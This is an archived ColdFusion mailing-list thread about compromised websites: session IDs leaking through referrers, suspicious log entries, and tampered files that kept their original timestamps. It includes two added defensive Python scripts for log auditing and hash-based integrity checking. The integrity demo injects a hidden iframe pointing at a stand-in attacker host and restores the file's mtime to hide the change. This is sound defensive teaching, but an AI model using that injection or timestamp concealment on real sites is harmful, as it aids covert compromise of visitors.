Re: Anyway to automatically convert to URLSESSIONFORMAT
On Sat, Feb 9, 2013 at 7:55 PM, UXB denn...@uxbinternet.com wrote:
> From a security perspective cookies are a better option because passing IDs in the open can result in session hijacking when someone bookmarks a link.

This isn't even the biggest threat. Since you are passing the SessionID in the URL, it will be included in the referrer string and LOGGED by someone else's server each time you allow a link out from your website. This appears to be the root cause of the recent Yahoo Mail security breaches. This means that if you simply link to my website from yours, using a plain-jane link, that is all that is required for me to potentially hijack your users' sessions, simply by examining the referrer strings.

-Cameron
--
Cameron Childress -- p: 678.637.5072 im: cameroncf
facebook http://www.facebook.com/cameroncf | twitter http://twitter.com/cameronc | google+ https://profiles.google.com/u/0/117829379451708140985

~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354442 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
New Round of Exploits going on
It appears that there are either web developers running sites with current infections, or there is a new round happening. I have seen one site hacked twice in the last two weeks, and although they were never able to run the code, there is very little evidence that this exploit came from the website it was found on.

However, the one thing that I noticed in the logs at the time of the modified HTML file (and yes, they only modified HTML files and not CFML files) was a HEAD request in the logs that came from a website that looked suspicious. When I googled this domain my antivirus detected it as a Black Hole security exploit, but what was worrying was that this log entry with the domain had the website that was hacked in it. It looks like this, with the details changed to protect both parties:

2013-02-06 01:43:48 xxx.xxx.xxx.xxx HEAD / - 80 - xxx.xxx.xxx.xxx Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:18.0)+Gecko/20100101+Firefox/18.0 http://somedomain/?info/domainattacked 301 0 0 225 432 125

Now you can see that this was redirected, but if there is a known exploit these guys are still able to do this, as was evident with the latest Anonymous attacks. I encourage people to look at their websites and check to see if they have been infected with this new wave.

I have gone through the logs of the website in question and there is no evidence that it was infected directly through the website, except for that one line in the log mentioned above. What really shocks me even more is that the hosting company refuses to acknowledge that they may be responsible, which would be fair enough if this website did not have all the checks to sanitize all form inputs with AntiSamy. There is also no evidence that this was a SQL injection attack either, which is near impossible unless there is a known bug with Hibernate and its current binding of variables (a.k.a. cfqueryparam for Hibernate).

Anyway, as some people have mentioned that they have been attacked in the last few weeks, I wanted to share this, as there seems to be a new exploit going around that may or may not be related to ColdFusion on shared hosts, but they seem to not care who they are infecting.

-- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411
Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354443
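The two log-reading points raised so far, Cameron's warning that a session ID in the URL travels in the Referer header into other people's logs, and Andrew's suspicious HEAD request with a foreign referrer, can both be checked mechanically against an IIS W3C extended log. The script below is an added example for this page, not code from either poster; the log lines it scans are constructed (RFC 5737 placeholder addresses and made-up hostnames, with the HEAD line modelled on the one Andrew quoted), and the list of session parameter names is an assumption you should extend for your own application. Seeing CFID/CFTOKEN in your own site's referrers is the tell that every outbound link is leaking them too.

```python
"""Scan IIS W3C extended log records for two signals discussed in the thread:
(1) a session identifier travelling in a URL (request query or Referer), and
(2) HEAD requests that arrive with a Referer pointing at some other host.
The sample log and hostnames below are constructed for this example."""
from urllib.parse import urlsplit, parse_qs

# Default IIS field order; overridden by a #Fields: directive when one is present.
FIELDS = ("date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username "
          "c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status "
          "sc-bytes cs-bytes time-taken").split()

# Query parameters that commonly carry a session token (assumed set; CFID/CFTOKEN
# are ColdFusion's, jsessionid the servlet-container form). Extend for your app.
SESSION_PARAMS = {"cfid", "cftoken", "jsessionid", "phpsessid", "sessionid"}

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken
2013-02-06 01:43:48 192.0.2.10 HEAD / - 80 - 198.51.100.7 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:18.0)+Gecko/20100101+Firefox/18.0 http://somedomain.example/?info/domainattacked 301 0 0 225 432 125
2013-02-06 01:44:02 192.0.2.10 GET /index.cfm - 80 - 203.0.113.5 Mozilla/5.0 http://www.example.com/account.cfm?CFID=12345&CFTOKEN=67890123 200 0 0 5120 640 31
2013-02-06 01:44:09 192.0.2.10 GET /images/logo.png - 80 - 203.0.113.5 Mozilla/5.0 http://www.example.com/index.cfm 200 0 0 2048 410 5
2013-02-06 01:45:00 192.0.2.10 HEAD /about.cfm - 80 - 203.0.113.9 curl/7.29.0 - 200 0 0 180 120 2
"""


def parse_w3c(text):
    """Yield one dict per record, honouring the #Fields directive if present."""
    fields = list(FIELDS)
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed record; a real tool would report it and keep going
        yield dict(zip(fields, parts))


def session_params_in_query(query):
    """Session parameter names present in a raw query string (IIS logs '-' for none)."""
    if not query or query == "-":
        return set()
    # parse_qs decodes the '+' that IIS substitutes for spaces in logged fields.
    return {k.lower() for k in parse_qs(query, keep_blank_values=True)} & SESSION_PARAMS


def session_params_in(url):
    """Session parameter names present in a full URL's query string."""
    if not url or url == "-":
        return set()
    return session_params_in_query(urlsplit(url).query)


def referer_host(url):
    if not url or url == "-":
        return None
    return urlsplit(url).hostname


def audit(text, own_hosts):
    """Return (kind, record) findings. own_hosts: hostnames that belong to this site."""
    findings = []
    for rec in parse_w3c(text):
        ref = rec.get("cs(Referer)", "-")
        if session_params_in(ref) or session_params_in_query(rec.get("cs-uri-query", "-")):
            findings.append(("session-id-in-url", rec))
        host = referer_host(ref)
        if rec["cs-method"] == "HEAD" and host and host not in own_hosts:
            findings.append(("head-with-foreign-referer", rec))
    return findings


if __name__ == "__main__":
    for kind, rec in audit(SAMPLE_LOG, {"www.example.com"}):
        print(kind, rec["date"], rec["time"], rec["c-ip"], rec["cs-method"],
              rec["cs-uri-stem"], rec["cs(Referer)"])
```

Run it against a real log by reading the file into `audit()` with your site's hostnames in `own_hosts`. A `session-id-in-url` hit on internal navigation means the same token is being handed to every external site you link to; the fix is on the application side (cookie-based session tracking), not in the log.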
Re: New Round of Exploits going on
I just got the below on a site. Not sure how to decrypt it to tell exactly what it's doing though. Client noticed that Google had flagged the site as 'compromised'. I'm pointing my finger at the hosting company - they've got a security issue if this can happen, correct? So, anybody know what this is doing?

Allaire Cold Fusion Template Header Size: New Version
[encrypted template body: binary data, not reproducible as text in this archive]
Re: New Round of Exploits going on
One thing I hate about some hosting companies is that they have Robust Exceptions switched on, but what concerns me even more is that they don't care that this is a security risk. If your hosting company is one of them, get in their ears about having it switched off. If they refuse, then it's time for a change.

Also, as a caution not a rule, if you're lucky enough to have the time, look into using any framework that supports MVC and SES rewrites. This has stopped them in their tracks, as they are not able to run the uploaded code. Not with ease, at least.

Still, I am not sure how they are uploading these files, as there is nothing in the logs that indicates this. I am guessing that something else on the server is compromised, and because they are able to (and do) look for exceptions being displayed to the screen, they now know where to start spreading their malware. My guess is there is an exploit still known and not public that is bypassing all sandboxing at the moment.

-- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411
Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354445
Re: New Round of Exploits going on
> Still I am not sure how they are uploading these files as there is nothing in the logs that indicates this.

For mine in the previous message, the altered file still had the ORIGINAL creation date on it - 2011 something - although it was altered last week. So, a search of all the site files for anything recently altered showed nothing.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354446
Re: New Round of Exploits going on
That would indicate that they were able to get the file stamp before modifying it and reapply the time stamp. Extreme long shot, but who knows how they are doing this.

-- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411

On Mon, Feb 11, 2013 at 4:43 PM, Les Mizzell lesm...@bellsouth.net wrote:
> Still I am not sure how they are uploading these files as there is nothing in the logs that indicates this.
>
> For mine in the previous message, the altered file still had the ORIGINAL creation date on it - 2011 something - although it was altered last week. So, a search of all the site files for anything recently altered showed nothing.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354447
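Two caveats a practitioner would want on the timestamp discussion above, followed by a worked check. First, on NTFS the creation date Les looked at is not touched when an existing file is overwritten in place; only the modification time moves, so a scan keyed on creation date would see nothing new even without any trickery. Second, the modification time itself is trivially reset (`touch -r` on Unix, `os.utime()` from any language, PowerShell's `LastWriteTime` on Windows), so Andrew's scenario needs no special access beyond the write itself. The only check that survives both is comparing content hashes against a baseline captured when the site was known-good. The script below is an added example, not code from the thread; it builds a throwaway web root in a temp directory with made-up file names and contents, alters one file, puts its old mtime back, and returns what a mtime-based scan and a hash-based scan each report.

```python
"""Why a 'recently modified' file search misses a tampered file whose mtime was
put back, and how a content-hash baseline catches it anyway.
The web root, file names and contents are constructed for this example."""
import hashlib
import os
import tempfile
import time
from pathlib import Path


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(root):
    """Map each file (path relative to root, POSIX form) to its SHA-256.
    Keep the result off the web server; a baseline the attacker can edit is worthless."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_of(p)
            for p in root.rglob("*") if p.is_file()}


def modified_since(root, since_epoch):
    """The naive check: files whose modification time is newer than a cutoff."""
    root = Path(root)
    return sorted(p.relative_to(root).as_posix() for p in root.rglob("*")
                  if p.is_file() and p.stat().st_mtime > since_epoch)


def diff_against_baseline(root, known):
    """Compare current hashes with the stored baseline: changed, added, removed."""
    now = baseline(root)
    return {
        "changed": sorted(p for p in now if p in known and now[p] != known[p]),
        "added": sorted(p for p in now if p not in known),
        "removed": sorted(p for p in known if p not in now),
    }


def demo():
    """Reproduce the thread's scenario: an old HTML file is altered and its
    original mtime reapplied. Returns what each scan reports."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "index.html").write_text("<html><body>hello</body></html>\n")
        (root / "js").mkdir()
        (root / "js" / "site.js").write_text("var x = 1;\n")

        # Age every file so the site looks like it was last touched two years ago.
        two_years_ago = time.time() - 2 * 365 * 86400
        for p in root.rglob("*"):
            if p.is_file():
                os.utime(p, (two_years_ago, two_years_ago))

        known = baseline(root)               # captured while the site was known-good
        cutoff = time.time() - 30 * 86400    # "anything changed in the last 30 days"

        # Attacker appends an injected element and restores the original mtime.
        target = root / "index.html"
        original_mtime = target.stat().st_mtime
        target.write_text(target.read_text()
                          + '<iframe src="http://attacker.example/" width="0" height="0"></iframe>\n')
        os.utime(target, (original_mtime, original_mtime))

        return {
            "mtime_scan": modified_since(root, cutoff),
            "hash_scan": diff_against_baseline(root, known),
        }


if __name__ == "__main__":
    result = demo()
    print("mtime-based scan found:", result["mtime_scan"])
    print("hash-based scan found:  ", result["hash_scan"])
```

On Linux the inode change time (`st_ctime`) is also updated by the write and cannot be set back by an unprivileged user, so it is a useful secondary signal there; on Windows `st_ctime` is the creation time, which carries no such guarantee. Neither replaces the hash comparison.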